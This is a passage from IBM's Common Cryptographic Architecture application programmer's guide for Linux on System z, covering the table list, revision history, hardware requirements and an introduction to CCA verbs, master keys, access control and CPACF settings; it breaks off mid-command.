Digital Signature Generate control information . . . . . . . . . . . . . . 361 +102.Keywords for Digital Signature Verify control information. . . . . . . . . . . . . . . . 365 +103.Keywords for PKAKey Generate control information . . . . . . . . . . . . . . . . . 371 +|| 104.Keywords for PKAKey Import control information . . . . . . . . . . . . . . . . . . 374 +105.Keywords for PKAKey Token Build control information . . . . . . . . . . . . . . . . 378 +|| 106.PKAKey Token Build - Key value structure length maximum values . . . . . . . . . . . 379 +107.PKAKey Token Build - Key value structure elements . . . . . . . . . . . . . . . . . 379 +108.Keywords for PKAKey Token Change control information . . . . . . . . . . . . . . . 385 +109.Keywords for PKAKey Translate control information . . . . . . . . . . . . . . . . . 388 +xii LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +110. Keywords for Remote Key Export certificate_parms parameter . . . . . . . . . . . . . 397 +111. Keywords for Trusted Block Create control information . . . . . . . . . . . . . . . . 404 +112. Return code values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407 +113. Reason codes for return code 0. . . . . . . . . . . . . . . . . . . . . . . . . 408 +114. Reason codes for return code 4. . . . . . . . . . . . . . . . . . . . . . . . . 408 +115. Reason codes for return code 8. . . . . . . . . . . . . . . . . . . . . . . . . 409 +116. Reason codes for return code 12 . . . . . . . . . . . . . . . . . . . . . . . . 418 +117. Reason codes for return code 16 . . . . . . . . . . . . . . . . . . . . . . . . 419 +118. AES Internal key token format, version X'04' . . . . . . . . . . . . . . . . . . . . 421 +119. AES internal key-token flag byte. . . . . . . . . . . . . . . . . . . . . . . . . 422 +120.Internal clear key token format . . . . . . . . . . . . . . . . . . . . . . . . . 423 +121.DES internal key token format . . . . . . . . . . . . . . . . . . . . . . . . . 423 +122.DES external key token format . . . . . . . . . . . . . . . . . . . . . . . . . 424 +123.DES null key token format . . . . . . . . . . . . . . . . . . . . . . . . . . . 425 +124.RSAPublic Key Token format. . . . . . . . . . . . . . . . . . . . . . . . . . 426 +125.RSAprivate external key token basic record format. . . . . . . . . . . . . . . . . . 427 +126.RSAprivate key token, 1024-bit Modulus-Exponent external format. . . . . . . . . . . . 428 +127.RSAprivate key token, 2048-bit Chinese Remainder Theorem external format. . . . . . . . 428 +128.RSAprivate internal key token basic record format. . . . . . . . . . . . . . . . . . 430 +129.RSAprivate internal key token, 1024-bit Modulus-Exponent format for cryptographic coprocessor +feature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431 +130.RSAprivate internal key token, 1024-bit Modulus-Exponent format for CEX3C. . . . . . . . 432 +131.RSAprivate internal key token, 2048-bit Chinese Remainder Theorem internal format . . . . . 433 +132.RSAvariable Modulus-Exponent token format. . . . . . . . . . . . . . . . . . . . 435 +|| 133.ECC key token format . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436 +|| 134.Associated data format for ECC private key token . . . . . . . . . . . . . . . . . . 438 +|| 135.AESKW wrapped payload format for ECC private key token . . . . . . . . . . . . . . 439 +136.PKAnull key token format . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 +|| 137.HMAC variable-length symmetric key-token, version X'05' (CCA4.1.0 or later). . . . . . . . 439 +|| 138.HMAC symmetric null key token format . . . . . . . . . . . . . . . . . . . . . . 443 +139.Trusted block sections and their use . . . . . . . . . . . . . . . . . . . . . . . 444 +140.Trusted block header format . . . . . . . . . . . . . . . . . . . . . . . . . . 446 +141.Trusted block trusted RSApublic key section (X'11') . . . . . . . . . . . . . . . . . 447 +142.Trusted block rule section (X'12') . . . . . . . . . . . . . . . . . . . . . . . . 448 +143.Summary of trusted block X'12' subsections . . . . . . . . . . . . . . . . . . . . 449 +144.Transport key variant subsection (X'0001') of trusted block rule section (X'12'). . . . . . . . 450 +145.Transport key rule reference subsection (X'0002') of trusted block rule section (X'12') . . . . . 451 +146.Common export key parameters subsection (X'0003') of trusted block rule section (X'12') 451 +147.Source key rule reference subsection (X'0004') of trusted block rule section (X'12') . . . . . . 453 +148.Export key CCAtoken parameters subsection (X'0005') of trusted block rule section (X'12') 453 +149.Trusted block key label (name) section (X'13') . . . . . . . . . . . . . . . . . . . 455 +150.Trusted block information section (X'14'). . . . . . . . . . . . . . . . . . . . . . 455 +151.Summary of trusted block information subsections . . . . . . . . . . . . . . . . . . 456 +152.Protection information subsection (X'0001') of trusted block information section (X'14'). . . . . 456 +153.Activation and expiration dates subsection (X'0002') of trusted block information section (X'14') 457 +154.Trusted block application-defined data section (X'15') . . . . . . . . . . . . . . . . . 457 +155.Default control vector values . . . . . . . . . . . . . . . . . . . . . . . . . . 463 +156.Versions of the MDC calculation method. . . . . . . . . . . . . . . . . . . . . . 493 +157.MDC calculation procedures . . . . . . . . . . . . . . . . . . . . . . . . . . 494 +158.PKA96 clear DES key record . . . . . . . . . . . . . . . . . . . . . . . . . . 511 +|| 159.Access Control Points and corresponding CCAverbs . . . . . . . . . . . . . . . . . 515 +160.Verbs called by the sample routines . . . . . . . . . . . . . . . . . . . . . . . 527 +161.CCAgroups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 546 +Tables xiii + +xiv LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +About this document +See “Terminology” on page xvii for the correct CCAfeature terminology. +| This document describes how to use the verbs provided in the Common CryptographicArchitecture (CCA) +| Release 4.0.0 and Release 4.1.0APIs for Linux on IBM® System z®. The CCAfunctions perform +| cryptographic operations using the IBM 4765 Crypto Express3 feature (CEX3C) in coprocessor mode. The +| CCAfunctions also perform some cryptographic operations using the IBM 4764 Crypto Express2 (CEX2C) +| feature in coprocessor mode. See “Concurrent installations” on page 549 for details. +This book is for planning and programming purposes only. +The CCAhost software provides an application programming interface through which applications request +secure, high-speed cryptographic services from the hardware cryptographic features. +| Where CCARelease 4.1.0 has been changed or enhanced from CCARelease 4.0.0, these changes have +| been noted. +Revision history +Third edition, March 2011, CCA Support Program Release 4.1.0 +| +| This edition describes the IBM CCABasic ServicesAPI for Release 4.1.0. For the supported environments +| and product ordering information, see: +| http://www.ibm.com/security/cryptocards +| For Linux for IBM System z, Release 4.1.0 changes to the CCAAPI include: +| v Enhanced PIN security with the addition ofANSI X9.8 restriction capabilities +| Three new access control points are added to enhance PIN security by blocking PIN attacks. See the +| Required commands sections of the Clear PIN GenerateAlternate (CSNBCPA), Encrypted PIN +| Translate (CSNBPTR), and Secure Messaging for PINs (CSNBSPN) verbs. +| v Wrap CCAkeys in Cipher-Block Chaining (CBC) mode +| Asecond key-wrapping method is added for DES that is a more secure version of Triple-DES ECB +| mode currently used by CCA. The enhanced version of key wrapping complies with current +| cryptographic standards that require key bundling. This new key-wrapping method can coexist with the +| CCAlegacy ECB mode of wrapping Triple-DES keys. The two methods can coexist on the same or +| multiple systems. +| v Elliptic Curve Cryptography (ECC) support +| New Elliptic Curve Cryptography (ECC) key generation, along with support for digital signature +| generation and verification using the Elliptic Curve Digital SignatureAlgorithm (ECDSA). This +| enhancement includes a new PKAkey-token for housing ECC public-key cryptographic keys and a new +| asymmetricAPKAmaster-key (32-byteAES key) for wrapping an ECC key-token, along with added +| support to the Master Key Process verb. +| v Hashed MessageAuthentication Code (HMAC) support for key generation and processing, but not for +| key storage. +| v These new verbs: +| – HMAC Generate (CSNBHMG) +| – HMAC Verify (CSNBHMV) +| – Key Generate2 (CSNBKGN2) +| – Key Part Import2 (CSNBKPI2) +©CopyrightIBMCorp.2007,2011 xv + +| – Key Test2 (CSNBKYT2) +| – Key Token Build2 (CSNBKTB2) +| – Key Token Change2 (CSNBKTC2) +| – Key Translate2 (CSNBKTR2) +| – Restrict KeyAttribute (CSNBRKA) +| – Symmetric Key Import2 (CSNDSYI2) +Second edition, April 2010, CCA Support Program Release 4.0.0 +This edition describes the IBM CCABasic ServicesAPI for Release 4.0.0. For the supported environments +and product ordering information, see: +http://www.ibm.com/security/cryptocards +For Linux for IBM System z, release 4.0.0 changes to the CCAAPI include: +v Support for the IBM Crypto Express3 feature (CEX3C) in coprocessor mode +v AJava Native Interface (JNI) form for most of the verbs +v Central ProcessorAssist for Cryptographic Functions (CPACF) support +v These new verbs: +– AES Key Record Create (CSNBAKRC) +– AES Key Record Delete (CSNBAKRD) +– AES Key Record List (CSNBAKRL) +– AES Key Record Read (CSNBAKRR) +– AES Key Record Write (CSNBAKRW) +– Control Vector Translate (CSNBCVT) +– Cryptographic Facility Version (CSUACFV) +– Cryptographic Variable Encipher (CSNBCVE) +– Key Test Extended (CSNBKYTX) +– MDC Generate (CSNBMDG) +– PKAKey Translate (CSNDPKT) +– Prohibit Export Extended (CSNBPEXX) +– Random Number Generate Long (CSNBRNGL) +– Remote Key Export (CSNDRKX) +– Retained Key Delete (CSNDRKD) +– Retained Key List (CSNDRKL) +– SymmetricAlgorithm Decipher (CSNBSAD) +– SymmetricAlgorithm Encipher (CSNBSAE) +– Trusted Block Create (CSNDTBC) +Who should use this document +This document is intended for application programmers who are responsible for writing application +programs that use the security application programming interface (API) to access cryptographic functions. +xvi LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Distribution-specific information +| In order to use the full set of CCARelease 4.1.0 functions, a distribution of Linux that has support for the +| CEX3C feature is required. This feature is available with IBM System z10® model GA3 and higher models. +| These Linux distributions support CCARelease 4.1.0, including CEX3C and CEX2C feature support: +| v Novell SUSE Linux Enterprise Server 11 SP1 (SLES 11 SP1) from Novell +| v Novell SUSE Linux Enterprise Server 10 SP3 (SLES 10 SP3) from Novell +| v Red Hat Enterprise Linux 5 Update 6 +| v Red Hat Enterprise Linux 6 +| Full CEX2C support is included with this CCARelease 4.1.0, however note that because of limits in the +| CEX2C hardware and firmware available, this is a limited subset of the CEX3C functions described in this +| document. In order to make use of this set of functions, a distribution of Linux that has support for the +| CEX2C feature is required. +| Note that 64-bit versions of this software are needed. 31-bit support is not provided. +Terminology +These terms are used for the CCAfeatures. For the remainder of this document, the short form (terms in +bold) will be used. +Term Description +CEX2C An IBM 4764 Crypto Express2 feature, configured in coprocessor mode. +| CEX3C An IBM 4765 Crypto Express3 feature, configured in coprocessor mode. +CEX*C Either the CEX2C, CEX3C, or (if plural) any combination of these. +Hardware requirements +In order to make use of the verbs provided in the Common CryptographicArchitecture (CCA)API for Linux +on IBM System z, your hardware must meet these minimum requirements: +v IBM System z10 model GA3 +| v One CEX3C feature, with one CEX3C adapter mapped to the z/VM® image or LPAR that uses it. The +| CEX3C must have CCA4.1.0z or greater firmware loaded (in order to have available all of the CCA +| 4.1.0z function). Older levels of firmware are supported with reduced function available. +| v If you plan to use a Trusted Key Entry (TKE) workstation, you must have a TKE V6.0 or higher +| workstation in order to see supported CEX3Cs. They are not seen when using TKE V5 or earlier +| workstations. +This is the maximum supported hardware configuration: +| v IBM zEnterprise 196 +v Two CEX3Cs, with four CEX3C adapters mapped to a single z/VM image or single LPAR. +| This hardware configuration is also supported: +| v IBM System z10 model GA3 +| v One or more CEX3Cs, with CCA4.1.0z or CCA4.0.3z firmware loaded. +| v One or more CEX2Cs, with a supported level of CCA3.x firmware loaded. See “Legacy support” on +| page 549 for details. +See “Concurrent installations” on page 549 for details about a mixed environment of CEX2C and CEX3C. +Aboutthisdocument xvii + +To determine if a card is a CEX2C or CEX3C, use one of these methods, available with two utilities +included in the CEX3C support program RPM, or your own custom implementation. +v Invoke the Cryptographic Facility Query verb (see “Determining if a card is a CEX2C or CEX3C” on +page 58) +v Use the sysfs interface, the hwtype attribute (see “The sysfs interface” on page 538) +| v Run panel.exe -x using the panel.exe utility installed with the RPM, to get a quick summary of cards +| available and their status. See “The panel.exe utility” on page 553. +| v Run ivp.e, another utility installed with the RPM, which gives more detailed information about each card +| available. SeeAppendixL, “Utilities,” on page 553. +| In order to use the CEX3C feature under z/VM versions 6.1, and 5.4, you need to apply theseAPAR fixes: +APAR number Description +VM64656 Introduces CEX3C support. +|| VM64727 Fixes problem with shared coprocessors. +VM64793 Introduces protected key CPACF support. +How to use this document +For encryption, CCAsupportsAdvanced Encryption Standard (AES), Data Encryption Standard (DES), +public key cryptography (PKAor RSA), and Elliptic Curve Cryptography (ECC). These are very different +cryptographic systems.Additionally, CCAprovidesAPIs for generating and verifying Message +Authentication Codes (MACs), Hashed MessageAuthentication Codes (HMACs), hashes, and PINS, as +well as other cryptographic functions. +Part1, “IBM CCAprogramming,” on page 1 focuses on IBM CCAprogramming. It includes the following +chapters: +v Chapter1, “Introduction to programming for the IBM Common CryptographicArchitecture,” on page 3 +describes the programming considerations for using the CCAverbs. It also explains the syntax and +parameter definitions used in verbs. Concurrency is also discussed. +v Chapter2, “UsingAES, DES, and HMAC cryptography and verbs,” on page 19 gives an overview of +AES, DES, and HMAC cryptography, and provides general guidance information on how these verbs +use different key types and key forms. +v Chapter3, “Introducing PKAcryptography and using PKAverbs,” on page 47 introduces Public Key +Algorithm (PKA) support and describes programming considerations for using the CCAPKAand ECC +verbs, such as the PKAkey token structure and key management. +Part2, “CCAverbs,” on page 55 focuses on CCAverbs and includes the following chapters: +| v Chapter4, “Using the CCAnodes and resource control verbs,” on page 57 describes using the CCA +| resource control verbs. +v Chapter8, “Key storage mechanisms,” on page 261 describes the use of key storage, key tokens, and +associated verbs. +v Chapter5, “ManagingAES and DES cryptographic keys,” on page 99 describes the verbs for generating +and maintaining DES andAES cryptographic keys, the Random Number Generate verb (which +generates 8-byte random numbers), the Random Number Generate Long verb (which generates up to +8192 bytes of random content), and the Secure Sockets Layer (SSL) security protocol. This chapter +also describes utilities to build DES andAES tokens, generate and translate control vectors, and +describes the PKAverbs that support DES andAES key distribution. +v Chapter6, “Protecting data,” on page 211 describes the verbs for enciphering and deciphering data. +xviii LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +v Chapter7, “Verifying data integrity and authenticating messages,” on page 233 describes the verbs for +generating and verifying MessageAuthentication Codes (MACs), generating and verifying Hashed +MessageAuthentication Codes (HMACs), generating Modification Detection Codes (MDCs), and +generating hashes (SHA-1, MD5, RIPEMD-160). +v Chapter9, “Financial services,” on page 303 describes the verbs for use in support of finance-industry +applications. This includes several categories. +– Verbs for generating, verifying, and translating personal identification numbers (PINS). +– Verbs that generate and verify VISAcard verification values andAmerican Express card security +codes. +– Verbs to support smart card applications using the EMV (Europay MasterCard Visa) standards. +v Chapter10, “Using digital signatures,” on page 359 describes the verbs that support using digital +signatures to authenticate messages. +v Chapter11, “Managing PKAcryptographic keys,” on page 369 describes the verbs that generate and +manage PKAkeys. +The appendixes include the following information: +v AppendixA, “Return codes and reason codes,” on page 407 explains the return and reason codes +returned by the verbs. +| v AppendixB, “Key token formats,” on page 421 describes the formats forAES, DES internal, external, +| and null key tokens, for PKApublic, private external, and private internal key tokens containing +| Rivest-Shamir-Adleman (RSA) information, PKAnull key tokens, ECC key tokens, HMAC key tokens, +| Transaction Validation Values (TVVs), and trusted blocks. +| v AppendixC, “Key forms and types used in the Key Generate verb,” on page 459 describes the key +| forms and types used by the Key Generate verb. +v AppendixD, “Control vectors and changing control vectors with the Control Vector Translate verb,” on +page 463 contains a table of the default control vector values that are associated with each key type +and describes the control information for testing control vectors, mask array preparation, selecting the +key-half processing mode, and an example of using the Control Vector Translate verb. +| v AppendixE, “PIN formats and algorithms,” on page 477 describes the PIN notation, formats, extraction +| rules, and algorithms. +v AppendixF, “Cryptographic algorithms and processes,” on page 491 describes various ciphering and +key verification algorithms, as well as the formatting of hashes and keys. +| v AppendixG, “Access control points and verbs,” on page 515 lists the access control points and their +| corresponding verbs. +v AppendixH, “Sample verb call routines,” on page 527 contains sample verb call routines, both in C and +Java, that illustrates the practical application of CCAverb calls. +v AppendixI, “Initial system set up tips,” on page 537 includes tips to help you set up your system for the +first time. +v AppendixJ, “CCAinstallation instructions,” on page 541 includes RPM installation, configuration, and +uninstallation instructions. +v AppendixK, “Coexistence of CEX3C and CEX2C features,” on page 549 includes information about +using CEX2C and CEX3C features in the same system, and other restrictions. +v AppendixL, “Utilities,” on page 553 describes the ivp.e and panel.exe utilities. +v “Notices” on page 561 contains notices, programming interface information, and trademarks. +Where to find more information +Other documents referenced in this document are: +v IBM Common CryptographicArchitecture: CryptographicApplication Programming Interface Reference, +SC40-1675 +Aboutthisdocument xix + +Related publications +v Device Drivers, Features, and Commands, SC33-8411 +See one of these Web Sites for the version of this book that is correct for your distribution of Linux: +– http://www.ibm.com/developerworks/linux/linux390/documentation_novell_suse.html +– http://www.ibm.com/developerworks/linux/linux390/documentation_red_hat.html +v z/OS Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s Guide, SA23-2211-05 +Do you have problems, comments, or suggestions? +Your suggestions and ideas can contribute to the quality and the usability of this document. If you have +problems using this document, or if you have suggestions for improving it, complete and mail the Reader's +Comment Form found at the back of the document. +xx LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Part 1. IBM CCA programming +This part of the document introduces programming for the IBM CCA,AES, DES, and PKAcryptography. +The chapters in this part explain how to use CCAnodes andAES, DES and PKAverbs. +| v Chapter1, “Introduction to programming for the IBM Common CryptographicArchitecture” describes the +| programming considerations for using the CCAverbs. It also explains the syntax and parameter +| definitions used in the verbs. Concurrency is also discussed. +| v Chapter2, “UsingAES, DES, and HMAC cryptography and verbs” gives an overview ofAES, DES, and +| ECC cryptography and provides general guidance information on how these verbs use different key +| types and key forms. +| v Chapter3, “Introducing PKAcryptography and using PKAverbs” introduces Public KeyAlgorithm (PKA) +| and Elliptic Curve Cryptography (ECC) support, and describes programming considerations for using the +| CCAPKAverbs, such as the PKAkey token structure and key management. +©CopyrightIBMCorp.2007,2011 1 + +2 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 1. Introduction to programming for the IBM Common +Cryptographic Architecture +This chapter introduces the IBM CCAapplication programming interface (API). The section explains basic +concepts and describes how you can obtain cryptographic and other services from the CEX3C feature and +CCA. +This chapter includes the following topics: +v “Available Common CryptographicArchitecture verbs” +v “Common CryptographicArchitecture functional overview” on page 4 +v “CPACF support” on page 8 +v “SecurityAPI programming fundamentals” on page 12 +v “How to compile and link CCAapplication programs” on page 16 +Available Common Cryptographic Architecture verbs +CCAproducts provide a variety of cryptographic processes and data-security techniques. Your application +| program can call verbs (sometimes called services) to perform the following functions: +| Data confidentiality +| Encrypt and decrypt information, typically using theAES or DES algorithms in Cipher Block Chaining +| (CBC) mode to enable data confidentiality. +| Data integrity +| Hash data to obtain a digest, or process the data to obtain a MessageAuthentication Code (MAC) or +| keyed hash MAC (HMAC), that is useful in demonstrating data integrity. +| Non-repudiation +| Generate and verify digital signatures using either the RSAalgorithm or the ECDSAalgorithm, to +| demonstrate data integrity and form the basis for non-repudiation. +| Authentication +| Generate, encrypt, translate, and verify finance industry personal identification numbers (PINs) and +| American Express®, MasterCard, and Visa card security codes with a comprehensive set of +| finance-industry-specific services. +| Key management +| Manage the variousAES, DES, ECC, and RSAkeys necessary to perform the above operations. +| Java interaction +| Interact with the Java Native Interface (JNI). Some of the CCAverbs have a specific version that can +| be used for JNI work. +| CCAmanagement +| Control the initialization and operation of CCA. +Subsequent sections group the many available verbs by topic. Each section lists the verbs in alphabetical +order by verb pseudonym. +The remainder of this section provides an overview of the structure of a CCAcryptographic framework and +introduces some important concepts and terms. +©CopyrightIBMCorp.2007,2011 3 + +Common Cryptographic Architecture functional overview +Figure1 provides a conceptual framework for positioning the CCAsecurityAPI, which you use to access a +common cryptographic architecture.Application programs make procedure calls to the CCAsecurityAPI to +obtain cryptographic and related I/O services. The CCAsecurityAPI is designed so that a call can be +issued from essentially any high-level programming language. The call, or request, is forwarded to the +cryptographic services access layer and receives a synchronous response; that is, your application +program loses control until the access layer returns a response after processing your request. +| +| +| Figure1.CCAsecurityAPI,accesslayer,andcryptographicengine +| +The products that implement the CCAsecurityAPI consist of both hardware and software components. +CCAsoftware support: The software consists of application development and runtime software +components. +| v The application development software primarily consists of language bindings that can be included in +| new applications to assist in accessing services available at theAPI. Language bindings are provided +| for the C and Java programming languages. +v The runtime software can be divided into the following categories: +– Service-requesting programs, including application and utility programs. +– The securityAPI, an agent function that is logically part of the calling application program or utility. +– The cryptographic services access layer: an environment-dependent request routing function, +key-storage support services, and device driver to access one or more hardware cryptographic +engines. +4 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +– The cryptographic engine software that gives access to the cryptographic engine hardware. +The cryptographic engine is implemented in the hardware of the CEX3C coprocessor. +Security-sensitive portions of CCAare implemented in the cryptographic engine software running in +the protected coprocessor environment. +| – Utility programs and tools provide support for administering CCAsecret keys, interacting with CCA +| managed symmetric and public key cryptography key storage, and configuring the software support. +You can create application programs that employ the CCAsecurityAPI or you can purchase applications +from IBM or other sources that use the products. This document is the primary source of information for +designing systems and application programs that use the CCAsecurityAPI with the cryptographic +coprocessors. +Cryptographic engine: The CCAarchitecture defines a cryptographic subsystem that contains a +cryptographic engine operating within a protected boundary. The coprocessor's tamper-resistant, +tamper-responding environment provides physical security for this boundary and the CCAarchitecture +provides the logical security needed for the full protection of critical information. +| CEX2C Coprocessor: The coprocessor provides a secure programming and hardware environment +| whereinAES, DES and RSAprocesses are performed. Each cryptographic coprocessor includes a +| general-purpose processor, non-volatile storage, and specialized cryptographic electronics. These +| components are encapsulated in a protective environment to enhance security. The IBM CCASupport +| Program enables applications to employ a set ofAES, DES and RSA-based cryptographic services +| utilizing the coprocessor hardware. Services include: +| v DES key and RSAkey-pair generation +| v DES and RSAhost-based key record management +| v Digital signature generation and verification +| v Cryptographic key wrapping and unwrapping +| v Data encryption, decryption and MAC generation/verification +| v PIN processing for the financial services industry +| v Other services, including DES key-management based on CCA's control-vector-enforced key separation +| CEX3C Coprocessor: The coprocessor provides a secure programming and hardware environment +| whereinAES, DES, RSA, Elliptic Curve, and HMAC processes are performed. Each cryptographic +| coprocessor includes a general-purpose processor, non-volatile storage, and specialized cryptographic +| electronics. These components are encapsulated in a protective environment to enhance security. The IBM +| CCASupport Program enables applications to employ a set ofAES, DES, RSA, Elliptic Curve, and +| HMAC-based cryptographic services utilizing the coprocessor hardware. Services include: +| v DES,AES, RSA, Elliptic Curve, and HMAC key-pair generation +| v DES,AES, RSA, Elliptic Curve, and HMAC host-based key record management +v Digital signature generation and verification +v Cryptographic key wrapping and unwrapping +v Data encryption, decryption and MAC generation/verification +v PIN processing for the financial services industry +v Other services, including DES key-management based on CCA's control-vector-enforced key separation +CCA: Common CryptographicArchitecture (CCA) is the basis for a consistent cryptographic product family. +Applications employ the CCAsecurityAPI to obtain services from, and to manage the operation of, a +cryptographic system that meets CCAarchitecture specifications. +CCAaccess control: Each CCAnode has an access-control system enforced by the hardware and +protected software. The robust UNIX style access controls integrated into the Linux operating system are +used to protect the integrity of the underlying CCAhardware environment. The specialized processing +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 5 + +environment provided by the cryptographic engine can be kept secure because selected services are +provided only when certain requirements are met or a Trusted Key-Entry console is used to enable +access. The access-control decisions are performed within the secured environment of the cryptographic +engine and cannot be subverted by rogue code that might run on the main computing platform. +Coprocessor certification:After quality checking a newly manufactured coprocessor, IBM loads and +certifies the embedded software. Following the loading of basic, authenticated software, the coprocessor +generates an RSAkey-pair and retains the private key within the cryptographic engine. The associated +public key is signed by a certification key securely held at the manufacturing facility and then the certified +device key is stored within the coprocessor. The manufacturing facility key has itself been certified by a +securely held key unique to the CEX3C product line. +The private key within the coprocessor, known as the device private key, is retained in the coprocessor. +From this time on, if tampering is detected or if the coprocessor batteries are removed or lose power in the +absence of bus power, the coprocessor sets all security-relevant keys and data items to zero. This process +is irreversible and results in the permanent loss of the factory-certified device key, the device private key, +and all other data stored in battery-protected memory. Security-sensitive data stored in the coprocessor +flash memory is encrypted. The key used to encrypt such data is itself retained in the battery-protected +memory. +CCAmaster key: When using the CCAarchitecture, working keys, including session keys and the RSA +| and ECC private keys used at a node to form digital signatures or to unwrap other keys, are generally +stored outside the cryptographic-engine protected environment. These working keys are wrapped (DES +triple-encrypted orAES encrypted) by the CCAmaster key. The master key is held in the clear (not +enciphered) within the cryptographic engine. +The number of keys usable with a CCAsubsystem is thus restricted only by the host server storage, not +by the finite amount of storage within the coprocessor secure module. In addition, the working keys can be +used by additional CCAcryptographic engines which have the same master key. This CCAcharacteristic is +useful in high-availability and high-throughput environments where multiple cryptographic processors must +function in parallel. +Establishing a CCAmaster key: To protect working keys, the master key must be generated and +initialized in a secure manner. One method uses the internal random-number generator for the source of +the master key. In this case, the master key is never external to the node as an entity and no other node +has the same master key unless master-key cloning is authorized and in use (unless, out of all the +possible values, another node randomly generates the same master-key data). If an uncloned coprocessor +loses its master key, for example, the coprocessor detects tampering and destroys the master key; there is +no way to recover the working keys that it wrapped. The number of possible values is: +v For DES and RSAmaster keys, 2168 +| v ForAES andAPKAmaster keys, 2256 +Another master-key-establishment method enables authorized users to enter multiple, separate key parts +into the cryptographic engine.As each part is entered, that part is XORed with the contents of the new +master-key register. When all parts have been accumulated, a separate command is issued to promote the +contents of the current master-key register to the old master-key register and to promote the contents of +the new master-key register to the current master-key register. The length of the key parts is: +v For DES and RSAmaster keys, 168 bits +| v ForAES andAPKAmaster keys, 256 bits +CCAverbs:Application and utility programs called requestors obtain service from the CCASupport +Program by issuing service requests (verb calls or procedure calls) to the runtime subsystem (see +AppendixH, “Sample verb call routines,” on page 527 for sample routines). To fulfill these requests, the +Support Program obtains service from the coprocessor software and hardware. +6 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +The available services are collectively described as the CCAsecurityAPI.All the software and hardware +accessed through the CCAsecurityAPI should be considered an integrated subsystem.Acommand +processor performs the verb request within the cryptographic engine. +Commands and access control, roles, profiles: In order to ensure that only designated individuals (or +programs) can run commands such as master-key loading, each command processor that performs +sensitive processing interrogates one or more control-point values within the cryptographic engine +access-control system for permission to perform the request. +The access-control system includes one or more roles. Each role defines the permissible control points for +users of that role. In the System z environment, all application programs run using the permissions defined +in the DEFAULT role for their domain. The DEFAULT role can only be modified using the TKE workstation. +For a description of the functions that are permitted by the default version of the DEFAULT role, see z/OS +Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s Guide. +How application programs obtain service +Application programs and utility programs obtain services from the security product by issuing service +requests to the runtime subsystem of software and hardware. Use a procedure call according to the rules +of your application language. The available services are collectively described as the securityAPI.All the +software and hardware accessed through the securityAPI should be considered an integrated subsystem. +When the cryptographic services access layer receives requests concurrently from multiple application +programs, it serializes the requests and returns a response for each request. There are other +multiprocessing implications arising from the existence of a common master-key and a common +key-storage facility. These topics are covered later in this book. +The way application programs and utilities are linked to theAPI services depends on the computing +environment. In the Linux environment, the operating system dynamically links application securityAPI +requests to the subsystem shared object library code. Compile application programs that use CCAand link +the compiled programs to the CCAlibrary. The library and its default distribution location is +/usr/lib64/libcsulcca.so. +Together, the securityAPI shared library and the environment-dependent request routing mechanism act +as an agent on behalf of the application and present a request to the server. Requests can be issued by +one or more programs. Each request is processed by the server as a self-contained unit of work. The +programming interface can be called concurrently by applications running as different processes. The +securityAPI can be used by multiple threads in a process and is thread safe. +In each server environment, a device driver provided by IBM supplies low-level control of the hardware +and passes the request to the hardware device. Requests can require one or more I/O commands from +the security server to the device driver and hardware. +The security server and a directory server manage key storage.Applications can store locally used +cryptographic keys in a key-storage facility. This is especially useful for long-life keys. Keys stored in key +storage are referenced using a key label. Before deciding whether to use the key-storage facility or to let +the application retain the keys, consider system design trade-off factors, such as key backup, the impact of +master-key changing, the lifetime of a key, and so forth. +Overlapped processing +Calls to the CCAsecurityAPI are synchronous, that is, your program loses control until the verb +completes. Multiple processing-threads can make concurrent calls to theAPI. +You can maximize throughput by organizing your application or applications to make multiple, overlapping +calls to the CCAAPI. You can also increase throughput by employing multiple coprocessors, each with +CCA. +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 7 + +Within the coprocessor, the CCAsoftware is organized into multiple threads of processing. This +multiprocessing design is intended to enable concurrent use of the coprocessor's main engine, PCIe +communications, DES and Secure HashAlgorithm-1 (SHA-1) engine, and modular-exponentiation engine. +Host-side key caching +Calls to the CCAsecurityAPI are synchronous, that is, your program loses control until the verb +completes. Multiple processing-threads can make concurrent calls to theAPI. +CCAprovides caching of key records obtained from key storage within the CCAhost code. However, the +host cache is unique for each host process. If different host processes access the same key record, an +update to a key record caused in one process does not affect the contents of the key cache held for other +processes. Caching of key records within the key-storage system can be suppressed so all processes +access the most current key-records. To suppress caching of key records, use the SET command to set +the environment variable CSUCACHE to NO. If this environment variable is not set, or is set to anything +other than NO, caching of key records will not be suppressed. The CSUCACHE environment variable does +not impact CPACF translated key caching. +CPACF support +Central ProcessorAssist for Cryptographic Functions (CPACF) support has these features: +v “Environment variables that affect CPACF usage” +v “Access control points that affect CPACF protected key operations” on page 9 +v “CPACF operation (protected key)” on page 9 +v “CCAlibrary CPACF preparation at startup” on page 11 +v “Interaction between the 'default card' and use of Protected Key CPACF” on page 11 +Environment variables that affect CPACF usage +The CSU_HCPUACLR and CSU_HCPUAPRT environment variables control whether the CPACF is used +for certain CCAfunctions. These variables are overridden by the explicit use of the Cryptographic +ResourceAllocate (CSUACRA) and Cryptographic Resource Deallocate (CSUACRD) verbs to enable or +disable these access patterns. To avoid confusion, the environment variables are given similar names to +the keywords used by Cryptographic ResourceAllocate (CSUACRA) and Cryptographic Resource +Deallocate (CSUACRD). +Note: The default values listed here are valid even if these environment variables are not defined. Their +settings represent default policy decisions made in the library code. +CSU_HCPUACLR +Use of the CPACF for clear key operations and hashing algorithms is allowed if this variable is set to '1' in +a profile setup file or with this command: +export 